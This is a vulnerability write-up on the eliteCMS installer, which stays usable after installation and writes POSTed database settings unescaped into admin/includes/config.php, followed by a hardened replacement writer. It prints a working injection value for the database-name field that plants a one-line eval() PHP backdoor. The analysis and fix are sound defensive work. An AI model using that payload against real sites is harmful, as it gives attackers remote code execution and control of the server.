The eliteCMS installer is not locked after installation finishes, so an attacker who can reach the installer URL can run the installation again.

A second vulnerability: the installer can be made to write a one-line PHP backdoor ("一句话") directly into admin/includes/config.php. Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...(omitted)...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
    ...
Now look at where those session values come from:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation. If the POSTed database name is:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
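For comparison, here is an added example of how the step-4 writer should be built; it is not eliteCMS's own code. It closes both issues described above: the installer refuses to run once a lock file exists, and POSTed values are whitelisted and then emitted with var_export() so they can only ever become a string literal in the generated config.php, never PHP code. INSTALL_LOCK, CONFIG_FILE, validate_field(), build_config() and write_config() are names assumed for this example; the config path and the mysql_* connection logic are those the original installer writes.

```php
<?php
// Added example, not eliteCMS's own code: a hardened version of the installer's
// "step 4" config writer. INSTALL_LOCK, CONFIG_FILE, validate_field(),
// build_config() and write_config() are names assumed for this example.

define('INSTALL_LOCK', __DIR__ . '/install.lock');                 // assumed lock-file path
define('CONFIG_FILE',  __DIR__ . '/../admin/includes/config.php'); // path the original installer writes

// The original installer has no such check, which is why step 4 can be replayed
// by anyone who can reach the installer URL.
function installer_is_locked() {
    return file_exists(INSTALL_LOCK);
}

// Reject anything that does not look like a host name, database name or user
// name; a password may contain any character but must not be empty. Returns
// the value as a string or throws InvalidArgumentException.
function validate_field($name, $value) {
    $value = (string) $value;
    switch ($name) {
        case 'DB_SERVER':
            if (!preg_match('/^[A-Za-z0-9.\-]{1,253}(:[0-9]{1,5})?$/', $value)) {
                throw new InvalidArgumentException('invalid DB_SERVER');
            }
            break;
        case 'DB_NAME':
        case 'DB_USER':
            if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $value)) {
                throw new InvalidArgumentException("invalid $name");
            }
            break;
        case 'DB_PASS':
            if ($value === '') {
                throw new InvalidArgumentException('empty DB_PASS');
            }
            break;
        default:
            throw new InvalidArgumentException("unknown field $name");
    }
    return $value;
}

// Generate the config.php source. Every value is emitted with var_export(),
// which yields a correctly quoted and escaped PHP string literal, so user data
// always lands inside a string and never as code (defence in depth behind
// validate_field()). The trailing "?>" the original writes is deliberately
// omitted.
function build_config(array $settings) {
    $src = "<?php\n";
    foreach (array('DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS') as $key) {
        $src .= 'define(' . var_export($key, true) . ', '
              . var_export($settings[$key], true) . ");\n";
    }
    // Connection logic as the original installer writes it; the CMS expects
    // these variables, so the emitted source keeps the same API.
    $src .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $src .= "if (!\$connection) {\n";
    $src .= "    die(\"Database connection failed\" . mysql_error());\n";
    $src .= "}\n";
    $src .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $src .= "if (!\$db_select) {\n";
    $src .= "    die(\"Database select failed\" . mysql_error());\n";
    $src .= "}\n";
    return $src;
}

// Entry point for step 4: refuse if already installed, validate the POSTed
// fields, write the config via a temp file and rename, then drop the lock file.
function write_config(array $post) {
    if (installer_is_locked()) {
        header('HTTP/1.1 403 Forbidden');
        exit('Installation has already been completed; remove install.lock to reinstall.');
    }
    $settings = array();
    foreach (array('DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS') as $key) {
        $settings[$key] = validate_field($key, isset($post[$key]) ? $post[$key] : '');
    }
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, build_config($settings), LOCK_EX) === false
        || !rename($tmp, CONFIG_FILE)) {
        throw new RuntimeException('could not write ' . CONFIG_FILE);
    }
    file_put_contents(INSTALL_LOCK, 'installed ' . date('c') . "\n");
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_GET['step']) && $_GET['step'] === '4') {
    write_config($_POST);
}
```

With this writer, a DB_NAME containing `"`, `?` or `<` fails the whitelist before anything is written, and even a value that passes is serialised by var_export(), so the generated define() always contains a closed string literal. The lock file gives operators a simple post-install check as well: if install.lock is missing on a deployed site, or config.php is newer than it, the installer has been run again and the config should be inspected.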